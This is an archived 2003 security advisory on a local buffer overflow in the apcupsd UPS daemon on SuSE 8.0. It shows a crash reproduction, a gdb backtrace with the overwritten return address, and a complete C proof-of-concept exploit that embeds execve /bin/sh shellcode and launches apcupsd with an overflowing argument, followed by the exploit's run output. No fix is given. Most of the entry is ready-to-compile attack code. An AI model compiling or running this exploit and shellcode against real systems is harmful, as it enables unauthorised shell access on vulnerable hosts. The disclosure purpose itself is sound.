21th Mar 2003 [SBWID-6082]
COMMAND
apcupsd local buffer overflow
SYSTEMS AFFECTED
tested with apcupsd delivered with Suse 8.0
PROBLEM
Thanks to Serkan Akpolat [[email protected]] advisory :
Apcupsd is a deamon for most APC's UPS for Linux There is no bounds
checking in the source code ,so overflowing the buffer is possible.
Apcupsd is by default not setuid root (SuSE 8.0) A proof of concept
shell spawning exploit is attached to mail.
milkshake:~ # apcupsd -f
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
milkshake:~ # gdb -q /sbin/apcupsd ./core
(no debugging symbols found)...
Core was generated by `apcupsd -f
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libpthread.so.0...(no debugging symbols
found)...done.
[New Thread 1024 (LWP 1920)]
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x40091a99 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40091a99 in vfprintf () from /lib/libc.so.6
#1 0x400a8a86 in vsprintf () from /lib/libc.so.6
#2 0x08049b0c in strcpy ()
#3 0x41414141 in ?? ()
(gdb) q
Exploit spawns a shell with the uid of the user ,who runs the exploit.
Tested on SuSE 8.0
milkshake:~ # cat eXapcupsd.c
/* Proof of Concept Code for buffer overflow vulnerability in apcupsd--------*/
/* This code has been tested in SuSE 8.0 -----------------------------------*/
/* Apcupsd isn't by default setuid root in SuSE 8.0------------------------*/
/* This code spawns a shell with the uid of the user, who runs the expolit*/
/* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr team---*/
/* Written by Serkan Akpolat [email protected] --------------------------*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 500
#define PADDING 3
char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* Murat Balaban execve /bin/sh shellcode */
int main(void)
{
char *env[3] = {sc, NULL};
char buf[BUFSIZE];
int i,j,ret;
int *ap;
for(j=0;j < PADDING;j++){
buf[j]='A';}
ap = (int *)(buf + PADDING);
ret = 0xbffffffa - strlen(sc) -strlen("/sbin/apcupsd");
printf("Shellcode is on 0x%08x , %d junk bytes used for
alignment.\n",ret,PADDING);
printf("\t\t<--PRESS ENTER-->");
for (i = 0; i < BUFSIZE - 8; i += 4)
*ap++ = ret;
*ap++ ='\0';
getchar();
execle("/sbin/apcupsd", "apcupsd", "-f", buf, NULL, env);
}
milkshake:~ # gcc eXapcupsd.c
milkshake:~ # ./a.out
Shellcode is on 0xbfffffc0 , 3 junk bytes used for alignment.
<--PRESS ENTER-->
apcupsd FATAL ERROR in apcconfig.c at line 833
Error opening configuration file
(AAA������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������): �~^
SOLUTION
?